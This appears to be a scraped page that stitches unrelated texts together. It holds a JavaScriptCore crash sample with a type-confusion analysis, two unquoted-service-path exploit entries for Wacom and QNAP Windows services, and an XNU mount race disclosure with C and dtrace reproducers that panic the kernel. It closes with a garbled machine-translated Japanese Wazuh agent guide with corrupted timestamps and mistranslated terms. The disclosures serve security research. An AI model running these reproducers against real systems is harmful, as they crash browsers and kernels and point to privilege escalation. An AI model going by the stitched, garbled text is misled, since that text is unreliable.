HireHackking

The following sample was found by Fuzzilli and then slightly modified. It crashes JSC in debug builds: function main() { const v2 = [1337,1337]; const v3 = [1337,v2,v2,0]; Object.__proto__ = v3; for (let v10 = 0; v10 < 1000; v10++) { function v11(v12,v13) { const v15 = v10 + 127; const v16 = String(); const v17 = String.fromCharCode(v10,v10,v15); const v19 = Object.shift(); function v23() { let v28 = arguments; } const v29 = Object(); const v30 = v23({},129); const v31 = [-903931.176976766,v17,,,-903931.176976766]; const v32 = v31.join(""); try { const v34 = Function(v32); const v35 = v34(); for (let v39 = 0; v39 < 127; v39++) { const v41 = isFinite(); let v42 = isFinite; function v43(v44,v45,v46) { } const v47 = v41[4]; const v48 = v47[64]; const v49 = v35(); const v50 = v43(); const v51 = v34(); } } catch(v52) { } } const v53 = v11(); } } noDFG(main); noFTL(main); main(); Crashes with: ASSERTION FAILED: cell->inherits(*cell->JSC::JSCell::vm(), std::remove_pointer<T>::type::info()) ../../Source/JavaScriptCore/runtime/WriteBarrier.h(58) : void JSC::validateCell(T) [T = JSC::JSFunction *] 1 0x108070cb9 WTFCrash 2 0x103907f0b WTFCrashWithInfo(int, char const*, char const*, int) 3 0x106c0900f void JSC::validateCell<JSC::JSFunction*>(JSC::JSFunction*) 4 0x106c0275f JSC::WriteBarrierBase<JSC::JSFunction, WTF::DumbPtrTraits<JSC::JSFunction> >::set(JSC::VM&, JSC::JSCell const*, JSC::JSFunction*) 5 0x10705a727 JSC::DirectArguments::setCallee(JSC::VM&, JSC::JSFunction*) 6 0x107084753 operationCreateDirectArgumentsDuringExit 7 0x4d8af2e06484 8 0x4d8af2e034c3 9 0x1078661b7 llint_entry 10 0x107848f70 vmEntryToJavaScript 11 0x107740047 JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) 12 0x10773f650 JSC::Interpreter::executeProgram(JSC::SourceCode const&, JSC::ExecState*, JSC::JSObject*) 13 0x107a9afc5 JSC::evaluate(JSC::ExecState*, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) 14 0x1039549a6 runWithOptions(GlobalObject*, CommandLine&, bool&) 15 0x10392a10c jscmain(int, char**)::$_4::operator()(JSC::VM&, GlobalObject*, bool&) const 16 0x103909aff int runJSC<jscmain(int, char**)::$_4>(CommandLine const&, bool, jscmain(int, char**)::$_4 const&) 17 0x103908893 jscmain(int, char**) 18 0x10390880e main 19 0x7fff79ad63d5 start The assertion indicates a type confusion. In particular, setCallee stores a JSCell into a WriteBarrier<JSFunction> which is not actually a JSFunction, triggering this assertion. Below is my preliminary analysis of the bug. When DFG compiles v11, it decides to inline v23 and the isFinite function. The relevant parts of the resulting DFG graph (with many omissions) follow: # Inlined v23 2 0: --> v23#EOpuso:<0x1078a43c0, bc#222, Call, closure call, numArgs+this = 3, numFixup = 0, stackOffset = -26 (loc0 maps to loc26)> 38 2 0: 207:< 1:-> GetScope(Check:Untyped:@169, JS|PureInt, R:Stack(-23), bc#1, ExitValid) 39 2 0: 208:<!0:-> MovHint(Check:Untyped:@207, MustGen, loc30, R:Stack(-23), W:SideState, ClobbersExit, bc#1, ExitValid) 40 2 0: 209:< 1:-> SetLocal(Check:Untyped:@207, loc30(QC~/FlushedJSValue), R:Stack(-23), W:Stack(-31), bc#1, exit: bc#222 --> v23#EOpuso:<0x1078a43c0> (closure) bc#3, ExitValid) predicting None 44 2 0: 213:< 1:-> CreateDirectArguments(JS|PureInt, R:Stack,Stack(-23),HeapObjectCount, W:HeapObjectCount, Exits, ClobbersExit, bc#7, ExitValid) 45 2 0: 214:<!0:-> MovHint(Check:Untyped:@213, MustGen, loc32, R:Stack(-23), W:SideState, ClobbersExit, bc#7, ExitInvalid) 46 2 0: 215:< 1:-> SetLocal(Check:Untyped:@213, loc32(SC~/FlushedJSValue), R:Stack(-23), W:Stack(-33), bc#7, exit: bc#222 --> v23#EOpuso:<0x1078a43c0> (closure) bc#9, ExitValid) predicting None 2 0: <-- v23#EOpuso:<0x1078a43c0, bc#222, Call, closure call, numArgs+this = 3, numFixup = 0, stackOffset = -26 (loc0 maps to loc26)> 4 0: Block #4 (bc#317): (OSR target) 24 4 0: 322:< 1:-> JSConstant(JS|PureInt, Weak:Object: 0x1078e4000 with butterfly 0x18052e8408 (Structure %C0:global), StructureID: 40546, bc#347, ExitValid) 27 4 0: 325:< 1:-> SetLocal(Check:Untyped:@322, loc30(DE~/FlushedJSValue), W:Stack(-31), bc#347, exit: bc#354, ExitValid) predicting None # Inlined isFinite() 4 0: --> isFinite#DJEgRe:<0x1078a4640 (StrictMode), bc#362, Call, known callee: Object: 0x1078cfd50 with butterfly 0x0 (Structure %Cm:Function), StructureID: 63290, numArgs+this = 1, numFixup = 1, stackOffset = -38 (loc0 maps to loc38)> 37 4 0: 335:< 1:-> JSConstant(JS|PureInt, Undefined, bc#0, ExitValid) 38 4 0: 336:<!0:-> MovHint(Check:Untyped:@322, MustGen, loc32, W:SideState, ClobbersExit, bc#0, ExitValid) 41 4 0: 339:< 1:-> SetLocal(Check:Untyped:@322, loc32(FE~/FlushedJSValue), W:Stack(-33), bc#0, ExitValid) predicting None Note that some bytecode registers (locX) are reused to hold different values in this code. The DFGPhantomInsertionPhase is responsible for identifying bytecode registers (locX) that have to be recovered during a bailout and placing Phantom nodes into the IR to ensure the required DFG values are alive so the bytecode registers can be restored from them. When the DFGPhantomInsertionPhase phase runs on this code and wants to determine the values needed for a bailout somewhere at the start of the try block, it decides that loc32 would have to be restored as it is assigned above but still used further down (in the inlined code of isFinite). As such, it inserts a Phantom node. When the bailout then actually happens (presumably because the `new Function()` fails), loc32 is attempted to be restored (by then, CreateDirectArguments has been replaced by a PhantomCreateDirectArguments which doesn't actually create the arguments object unless a bailout happens), resulting in a call to operationCreateDirectArgumentsDuringExit. This call requires the value of `callee` as argument. As such, the callee value is reconstructed as well. In the inlined callframe, the callee value is expected to be stored in loc30 (I think). However, by the time the bailout happens, loc30 has been reused, in this case by storing the global object into it. As such, the code that recovers the values (incorrectly) restores the callee value to the global object and passes it to operationCreateDirectArgumentsDuringExit. When this reference is then stored into a WriteBarrier<JSFunction> during a call to setCallee, an assertion is raised in debug builds. It is not clear to me at which point a different decision should have been made here. Unfortunately, it is quite tedious to manually modify this sample as most changes to it will quickly break the specific bytecode register allocation outcome required to trigger the bug. I could imagine this bug to be exploitable if the invalid callee value is somehow subsequently accessed by code, e.g. user supplied code, the GC, or other parts of the engine that inspect bytecode registers, and assumed to be a JSFunction*. However, I have not verified that this is possible.

# Exploit Title: Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path # Discovery by: Marcos Antonio León (psk) # Discovery Date: 2019-11-04 # Vendor Homepage: https://www.wacom.com # Software Link : http://cdn.wacom.com/U/drivers/IBMPC/pro/WacomTablet_637-3.exe # Tested Version: 6.3.7.3 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Home x64 es # Step to discover Unquoted Service Path: C:\>sc qc WTabletServicePro [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: WTabletServicePro TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Tablet\Wacom\WTabletServicePro.exe GRUPO_ORDEN_CARGA : PlugPlay ETIQUETA : 0 NOMBRE_MOSTRAR : Wacom Professional Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges.

On macOS, when a new mount point is created, the kernel uses checkdirs() to, as a comment above the function explains: "Scan all active processes to see if any of them have a current or root directory onto which the new filesystem has just been mounted. If so, replace them with the new mount point." In other words, XNU behaves as follows: $ hdiutil attach ./mount_cwd.img -nomount /dev/disk2 $ cd mnt $ ls -l total 0 -rw-r--r-- 1 projectzero staff 0 Aug 6 18:05 underlying $ mount -t msdos -o nobrowse /dev/disk2 . $ ls -l total 0 -rwxrwxrwx 1 projectzero staff 0 Aug 6 18:04 onfat $ (This is different from e.g. Linux, where the cwd would still point to the directory on the root filesystem that is now covered by the mountpoint, and the second "ls -l" would show the same output as the first one.) checkdirs() uses proc_iterate() to execute checkdirs_callback() on each running process. checkdirs_callback() is implemented as follows: ====================================================== static int checkdirs_callback(proc_t p, void * arg) { struct cdirargs * cdrp = (struct cdirargs * )arg; vnode_t olddp = cdrp->olddp; vnode_t newdp = cdrp->newdp; struct filedesc *fdp; vnode_t tvp; vnode_t fdp_cvp; vnode_t fdp_rvp; int cdir_changed = 0; int rdir_changed = 0; /* * XXX Also needs to iterate each thread in the process to see if it * XXX is using a per-thread current working directory, and, if so, * XXX update that as well. */ proc_fdlock(p); fdp = p->p_fd; if (fdp == (struct filedesc *)0) { proc_fdunlock(p); return(PROC_RETURNED); } fdp_cvp = fdp->fd_cdir; fdp_rvp = fdp->fd_rdir; proc_fdunlock(p); if (fdp_cvp == olddp) { vnode_ref(newdp); tvp = fdp->fd_cdir; fdp_cvp = newdp; cdir_changed = 1; vnode_rele(tvp); } if (fdp_rvp == olddp) { vnode_ref(newdp); tvp = fdp->fd_rdir; fdp_rvp = newdp; rdir_changed = 1; vnode_rele(tvp); } if (cdir_changed || rdir_changed) { proc_fdlock(p); fdp->fd_cdir = fdp_cvp; fdp->fd_rdir = fdp_rvp; proc_fdunlock(p); } return(PROC_RETURNED); } ====================================================== `p->p_fd` contains the current working directory (`->fd_cdir`) and root directory (`->fd_rdir`) of the process; it is protected against modification by proc_fdlock()/proc_fdunlock(). Because checkdirs_callback() does not hold that lock across the entire operation, several races are possible; for example: - If `fdp->fd_cdir == olddp` is true and `fdp->fd_cdir` changes between the read `tvp = fdp->fd_cdir;` and the second `proc_fdlock(p);`, `vnode_rele(tvp);` will release a nonexistent reference, leading to reference count underflow. - If `fdp->fd_cdir == olddp` is true and the process calls chroot() between the first locked region and the second locked region, a dangling pointer will be written back to `fdp->fd_rdir`. I have written a simple reproducer for the first scenario; however, since the race window is quite narrow, it uses dtrace to make the race easier to hit (so you have to turn off SIP). To prepare an empty FAT32 filesystem and the PoC: ====================================================== Projects-Mac-mini:mount_cwd projectzero$ base64 -D | gunzip > mount_cwd.img H4sIAI3cSV0CA+3TLUsEcRAH4PUQlBMPk2Dyj82yoNmgQZsv4bQIwsrt6XLn7nG75cDgR/BziEls ghiu3rewXTGa1C0GszafZwZm4NcGZrp1e9XrlnE3qaLG7EzUqGv+vRGFaDv6dhOtb40fxgeH4WBn fzfU9nbaG5v1bK0+n17fr71UCyePrae5aLJ0Nn3bfJ0sT1amH+3LrAx150UVknBeFFVy3k9DJyt7 cQhH/TQp05DlZTr8kXf7xWAwCkneWWwOhmlZ1uso9NJRqIpQDevkIsnyEMdxWGxG/Mbx3fvnpzPA P+X/AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+EtfAgGlzAAA EAA= Projects-Mac-mini:mount_cwd projectzero$ Projects-Mac-mini:mount_cwd projectzero$ cat > flipflop2.c #include <fcntl.h> #include <err.h> #include <unistd.h> #include <stdio.h> int main(void) { int outer_fd = open(".", O_RDONLY); if (outer_fd == -1) err(1, "open outer"); int inner_fd = open("mnt", O_RDONLY); if (inner_fd == -1) err(1, "open inner"); while (1) { if (fchdir(inner_fd)) perror("chdir 1"); if (fchdir(outer_fd)) perror("chdir 2"); } } Projects-Mac-mini:mount_cwd projectzero$ cc -o flipflop2 flipflop2.c Projects-Mac-mini:mount_cwd projectzero$ cat > mountloop.c #include <stdlib.h> #include <stdio.h> #include <err.h> int main(int argc, char **argv) { char mount_cmd[1000]; sprintf(mount_cmd, "mount -t msdos -o nobrowse %s mnt", argv[1]); while (1) { if (system(mount_cmd) != 0) errx(1, "mount failed"); umount:; if (system("umount mnt")) { puts("umount failed"); goto umount; } } } Projects-Mac-mini:mount_cwd projectzero$ cc -o mountloop mountloop.c Projects-Mac-mini:mount_cwd projectzero$ Projects-Mac-mini:mount_cwd projectzero$ cat > test.dtrace #!/usr/sbin/dtrace -w -s __mac_mount:entry { mount_pending = 1; } __mac_mount:return { mount_pending = 0; } proc_iterate:entry { in_proc_iterate = 1; } proc_iterate:return { in_proc_iterate = 0; } vnode_rele_internal:entry { if (mount_pending && in_proc_iterate) { chill(1000*1000*10); } } Projects-Mac-mini:mount_cwd projectzero$ Projects-Mac-mini:mount_cwd projectzero$ chmod +x test.dtrace Projects-Mac-mini:mount_cwd projectzero$ Projects-Mac-mini:mount_cwd projectzero$ mkdir mnt Projects-Mac-mini:mount_cwd projectzero$ ====================================================== In one terminal, launch the dtrace script as root: ====================================================== Projects-Mac-mini:mount_cwd projectzero$ sudo ./test.dtrace dtrace: script './test.dtrace' matched 10 probes dtrace: allowing destructive actions ====================================================== In a second terminal, set up the loop device and launch the ./flipflop2 helper: ====================================================== Projects-Mac-mini:mount_cwd projectzero$ hdiutil attach ./mount_cwd.img -nomount /dev/disk2 Projects-Mac-mini:mount_cwd projectzero$ ./flipflop2 ====================================================== In a third terminal, launch the ./mountloop helper: ====================================================== Projects-Mac-mini:mount_cwd projectzero$ ./mountloop /dev/disk2 umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount' umount failed umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount' umount failed umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount' umount failed [...] ====================================================== (Don't mind the error spew from ./flipflop2 and ./mountloop, that's normal.) Within a few minutes, the system should panic, with an error report like this: ====================================================== *** Panic Report *** panic(cpu 0 caller 0xffffff80055f89c5): "vnode_rele_ext: vp 0xffffff80276ee458 kusecount(4) out of balance with usecount(3). v_tag = 25, v_type = 2, v_flag = 84800."@/BuildRoot/Library/Caches/com.apple.xbs/Sources/xnu/xnu-4903.270.47/bsd/vfs/vfs_subr.c:1937 Backtrace (CPU 0), Frame : Return Address 0xffffff911412b9d0 : 0xffffff80053ad6ed mach_kernel : _handle_debugger_trap + 0x47d 0xffffff911412ba20 : 0xffffff80054e9185 mach_kernel : _kdp_i386_trap + 0x155 0xffffff911412ba60 : 0xffffff80054da8ba mach_kernel : _kernel_trap + 0x50a 0xffffff911412bad0 : 0xffffff800535ab40 mach_kernel : _return_from_trap + 0xe0 0xffffff911412baf0 : 0xffffff80053ad107 mach_kernel : _panic_trap_to_debugger + 0x197 0xffffff911412bc10 : 0xffffff80053acf53 mach_kernel : _panic + 0x63 0xffffff911412bc80 : 0xffffff80055f89c5 mach_kernel : _vnode_rele_internal + 0xf5 0xffffff911412bcc0 : 0xffffff8005607f34 mach_kernel : _dounmount + 0x524 0xffffff911412bd60 : 0xffffff8005607877 mach_kernel : _unmount + 0x197 0xffffff911412bf40 : 0xffffff80059b92ad mach_kernel : _unix_syscall64 + 0x27d 0xffffff911412bfa0 : 0xffffff800535b306 mach_kernel : _hndl_unix_scall64 + 0x16 BSD process name corresponding to current thread: umount Boot args: -zp -v keepsyms=1 Mac OS version: 18G87 Kernel version: Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/RELEASE_X86_64 Kernel UUID: 982F17B3-0252-37FB-9869-88B3B1C77335 Kernel slide: 0x0000000005000000 Kernel text base: 0xffffff8005200000 __HIB text base: 0xffffff8005100000 System model name: Macmini7,1 (Mac-35C5E08120C7EEAF) System uptime in nanoseconds: 390113393507 last loaded kext at 197583647618: com.apple.filesystems.msdosfs 1.10 (addr 0xffffff7f89287000, size 69632) last unloaded kext at 61646619017: com.apple.driver.AppleIntelLpssGspi 3.0.60 (addr 0xffffff7f88208000, size 45056) [...] ======================================================

# Exploit Title: QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path # Discovery Date: 2019-11-05 # Exploit Author: Ivan Marmolejo # Vendor Homepage: https://www.qnap.com/en/ # Software Link: https://www.qnap.com/en/download # Version: 4.5.6.0607 # Vulnerability Type: Local # Tested on: Windows XP Profesional Español SP3 #Exploit ############################################################################################################################################## Summary: QNAP NetBak Replicator provides several options for copying files from your Windows computer to your NAS. By simplifying the backup process, NetBak Replicator helps ensure that your files are safe even when your computer becomes unavailable. Description: The application suffers from an unquoted search path issue impacting the service 'QVssService'. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application. ############################################################################################################################################## Step to discover the unquoted Service: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ QNAP Vss Service QVssService C:\Archivos de programa\QNAP\NetBak\QVssService.exe Auto ############################################################################################################################################## Service info: C:\Users\user>sc qc QVssService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: QVssService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Archivos de programa\QNAP\NetBak\QVssService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : QNAP Vss Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem ##############################################################################################################################################

エージェントライフサイクル エージェントを登録 監視するエージェントがコンピューターにインストールされたら、コミュニケーションを確立するにはWazuhマネージャーに登録する必要があります。これは、コマンドライン、AUTHD、またはRESTFUL APIを介して実行できます。 登録エージェントは、ユーザーが削除するまでマネージャーに残ります。次の図に示すように、プロキシにはいつでも4つの異なる状態があります。 プロキシステータス 接続なし：プロキシは登録されていますが、マネージャーに接続されていません。 保留中の認証プロセスが待機しています。管理サーバーはプロキシから接続要求を受信しましたが、他には何も受信していません。これは、ファイアウォールの問題を示している可能性があります。プロキシは、接続ライフサイクル中にこの状態に1回行われます。 アクティビティ：エージェントは正常に接続されており、マネージャーと通信できるようになりました。 切断：30分以内にエージェントがエージェントからメッセージを受け取らない場合、管理者はエージェントが切断されると見なします。 プロキシを削除します エージェントホストのマネージャーからエージェントを削除した後、接続ライフサイクルは終了しようとしています。これは、RESTFUL API、コマンドライン、またはAUTHDを介して実行できます（フォースオプションが有効になっている場合）。 強制挿入 別のプロキシに登録されたIPアドレスを使用してプロキシを追加しようとすると、manage_agentsコマンドはエラーを返します。まだ-fオプションで追加を強制することができます。 リスト： IP 10.0.0.10という名前のServer1という名前のプロキシがインストールされ、IDは005です。サーバーを再インストールする必要があると仮定すると、新しいプロキシを再インストールしてマネージャーに接続する必要があります。この場合、パラメーター-F 0を使用できます。つまり、以前のプロキシ（005）が削除され（バックアップを使用）、新しいプロキシがIPを使用して再作成されます。新しいエージェントには新しいIDがあります。 /var/ossec/bin/manage_agents -n server1 -a 10.10.10.10 -f 0 プロキシをリストします run/var/ossec/bin/agent_controlエージェントの接続ステータスをリストする： [root@wazhu -manage〜]＃/var/ossec/bin/agent_control -l wazuh agent_control。利用可能なエージェントのリスト: ID: 000、name3: wazhu-manage（サーバー）、IP: 127.0.0.1、アクティブ/ローカル ID: 001、name: agent01、IP: 45.77.105.194、Active ID: 002、name: agent02、IP: 155.138.165.154、Active ID: 003、name: agent03、IP: 45.77.93.54、Active ID: 004、name: agent04、IP: 45.77.4.139、Active エージェントレスデバイスのリスト: プロキシを削除します run/var/ossec/bin/manage_agentsエージェントを削除します プロキシを削除する前に確認する場合は、次のコマンドを使用します。 [root@wazhu-manage〜]＃/var/ossec/bin/manage_agents ***************************************** * Wazuh v3.8.0エージェントマネージャー。 * *次のオプションが利用可能です: * ***************************************** （a）ddエージェント（a）。 （e）エージェントのXtractキー（e）。 （l）すでに追加されたエージェント（L）。 （r）エージェント（R）をemoveします。 （やめる。 Action: a、e、l、r、q: rを選択します 利用可能なエージェント: ID: 001、name: agent01、IP: 45.77.105.194 ID: 002、name: agent02、IP: 155.138.165.154 ID: 003、name: agent03、IP: 45.77.93.54 ID: 004、name: agent04、IP: 45.77.4.139 削除するエージェントのIDを提供する（または終了するために「\ q」）: 004 削除を確認しますか？（y/n）: y エージェント '004'削除。 ***************************************** * Wazuh v3.8.0エージェントマネージャー。 * *次のオプションが利用可能です: * ***************************************** （a）ddエージェント（a）。 （e）エージェントのXtractキー（e）。 （l）すでに追加されたエージェント（L）。 （r）エージェント（R）をemoveします。 （やめる。 Action: A、E、L、R、またはQ: Qを選択します 確認なしにプロキシを削除する場合は、次のオプションを使用してください。 ＃/var/ossec/bin/manage_agents -r 001 ***************************************** * Wazuh v3.8.0エージェントマネージャー。 * *次のオプションが利用可能です: * ***************************************** （a）ddエージェント（a）。 （e）エージェントのXtractキー（e）。 （l）すでに追加されたエージェント（L）。 （r）エージェント（R）をemoveします。 （やめる。 Action: A、E、L、R、またはQ:を選択してください 利用可能なエージェント: id: 001、name: new、ip: any 削除されるエージェントのIDを提供する（または終了するために「\ q」）: 001 削除を確認しますか？（y/n）: y エージェント '001'削除。 **変更が有効になるには、OSSECを再起動する必要があります。 manage_agent:終了。 プロキシ接続ステータスをリストします 利用可能なエージェントのリストを返すようにget /agentsをリクエストします。 注：GETはCurlのデフォルト操作であり、特別な参照は必要ありません。 [root@wazhu-manage〜] { 'error ': 0、 'data ': { 'TotherItems': 5、 'アイテム': [ { 'status ':' Active '、 'name':' wazhu-manage '、 'ip':' 127.0.0.1 '、 'Manager':' Wazhu-manage '、 'node_name':' node01 '、 'DateAdd':' 2019-01-21 09:58336043 '、 'version ':' wazuh v3.8.0 '、 'LastKeepalive':' 9999-12-31 23:59:59 '、 'OS': { 'Major':' 7 '、 'name ':' centos linux '、 'uname':' linux | wazhu-manage | 3.10.0-957.1.3.el7.x86_64 |＃1 smp thu thu nov 29 14:49:43 UTC 2018 | x86_64 '、 'Platform ':' Centos '、 'バージョン':' 7 '、 'codename ':' core '、 'Arch':' x86_64 ' }、 'id':' 000 ' }、 { 'status ':' Active '、 'ConfigSum':' AB73AF41699F13FDD81903B5F23D8D00 '、 'グループ': [ 'デフォルト' ]、 'name ':' agent01 '、 'mergedSum':' f8d49771911ed9d5c45b03a40babd065 '、 'ip': '45 .77.105.194'、 'Manager':' Wazhu-manage '、 'node_name':' node01 '、 'Dateadd':' 2019-01-22 07:14336026 '、 'version ':' wazuh v3.8.0 '、 'LastKeepalive':' 2019-01-22 18:11336046 '、 'OS': { 'Major':' 16 '、 'name ':' ubuntu '、 'uname ':' linux | Agent01 | 4.4.0-137-Generic |＃163-Uubuntu SMP Mon Sep 24 13:14336043 UTC 2018 | X86_64 '、 'Platform ':' ubuntu '、 'バージョン': '16 .04.5 LTS'、 'Codename ':' Xenial Xerus '、 'Arch':' x86_64 '、 'minor':' 04 ' }、 'id':' 001 ' }、 { 'status ':' Active '、 'ConfigSum':' AB73AF41699F13FDD81903B5F23D8D00 '、 'グループ': [ 'デフォルト' ]、 'name ':' agent02 '、 'mergedSum':' f8d49771911ed9d5c45b03a40babd065 '、 'ip':' 155.138.165.154 '、 'Manager':' Wazhu-manage '、 'node_name':' node01 '、 'DateAdd':' 2019-01-22 09:29336021 '、 'version ':' wazuh v3.8.0 '、 'LastKeepalive':' 2019-01-22 18:11336039 '、 'OS': { 'Major':' 16 '、 'name ':' ubuntu '、 'uname ':' linux | Agent02 | 4.4.0-137-Generic |＃163-Uubuntu SMP Mon Sep 24 13:14336043 UTC 2018 | X86_64 '、 'Platform ':' ubuntu '、 'バージョン': '16 .04.5 LTS'、 'Codename ':' Xenial Xerus '、 'Arch':' x86_64 '、 'minor':' 04 ' }、 'id':' 002 ' }、 { 'status ':' Active '、 'ConfigSum':' AB73AF41699F13FDD81903B5F23D8D00 '、 'グループ': [ 'デフォルト' ]、 'name ':' agent03 '、 'mergedSum':' f8d49771911ed9d5c45b03a40babd065 '、 'ip': '45 .77.93.54'、 'Manager':' Wazhu-manage '、 'node_name':' node01 '、 'DateAdd':' 2019-01-22 10:15336026 '、 'version ':' wazuh v3.8.0 '、 'LastKeepalive':' 2019-01-22 18:11336042 '、 'OS': { 'Major':' 16 '、 'name ':' ubuntu '、 'uname ':' linux | Agent03 | 4.4.0-137-Generic |＃163-Uubuntu SMP Mon Sep 24 13:14336043 UTC 2018 | X86_64 '、 'Platform ':' ubuntu '、 'バージョン': '16 .04.5 LTS'、 'Codename ':' Xenial Xerus '、 'Arch':' x86_64 '、 'minor':' 04 ' }、 'id':' 003 ' }、 { 'status ':' Active '、 'ConfigSum':' AB73AF41699F13FDD81903B5F23D8D00 '、 'グループ': [ 'デフォルト' ]、 'name ':' agent04 '、 'mergedSum':' f8d49771911ed9d5c45b03a40babd065 '、 'ip': '45 .77.4.139'、 'Manager':' Wazhu-manage '、 'node_name':' node01 '、 'DateAdd':' 2019-01-22 10:34336001 '、 'version ':' wazuh v3.8.0 '、 'LastKeepalive':' 2019-01-22 18:11336043 '、 'OS': { 'Major':' 16 '、 'name ':' ubuntu '、 'uname ':' linux | Agent04 | 4.4.0-137-Generic |＃163-Uubuntu SMP Mon Sep 24 13:14336043 UTC 2018 | X86_64 '、 'Platform ':' ubuntu '、 'バージョン': '16 .04.5 LTS'、 'Codename ':' Xenial Xerus '、 'Arch':' x86_64 '、 'minor':' 04 ' }、 'id':' 004 ' } ] } } プロキシを削除します 指定されたエージェントを削除するには、delete /agents /:agent_idを要求します。 [root@wazhu -manage〜] {'error':0、' data ': {'msg':'すべての選択されたエージェントは削除されました '、' fitrected_agents': ['003']}}} wazuhアプリケーションを使用して リストエージェント: Wazuhアプリケーションの[エージェント]タブに移動することにより、登録されたすべてのエージェントに関する基本情報をリストおよび表示できます。 ディスプレイエージェント プロキシをクリックすると、プロキシに関する詳細情報が表示されます。 マネージャーへの接続を確認してください プロキシとマネージャーの間の接続を確認する前に、最初にプロキシがマネージャーのIPアドレスを指していることを確認します。これは、clientxmlタグを使用してossec.confによって設定されます。詳細については、クライアントリファレンスを参照してください。 ossec_configclienterveraddress149.248.9.0/addressprotocoludp/protocol/server/client/ossec_config これにより、Wazuh Manager Serverとして149.248.9.9が設定されます。これを行った後、プロキシを再起動する必要があります。 A.SystemD: ＃systemctlはwazuh-agentを再起動します B. sysv init:用 ＃サービスwazuh-agent Restart プロキシを登録して接続に正常に接続したら、マネージャーへのプロキシ接続のリストを表示できます。 [root@wazhu -manage〜]＃/var/ossec/bin/agent_control -lc #agent Manager wazuh agent_control。利用可能なエージェントのリスト: ID: 000、name3: wazhu-manage（サーバー）、IP: 127.0.0.1、アクティブ/ローカル ID: 001、name: agent01、IP: 45.77.105.194、Active ID: 002、name: agent02、IP: 155.138.165.154、Active また、マネージャーへのUDP接続が確立されていることを確認することにより、プロキシが正しく接続されているかどうかを確認することもできます。 root@agent02:〜＃netstat -vatunp | grep ossec -agentd #agentカスタマーサービス UDP 0 0 155.138.165.154:58599 149.248.9.033601514確立5088/OSSEC-Agentd 結果は、プロキシおよびマネージャーのIPアドレスと一致する必要があります。 Agent_Controlセクションでは、マネージャーに登録されたエージェントのステータスに関する情報を見つけることができます。 グループエージェント バージョン3.0.0の新機能。 登録プロキシを構成するには、2つの方法があります。 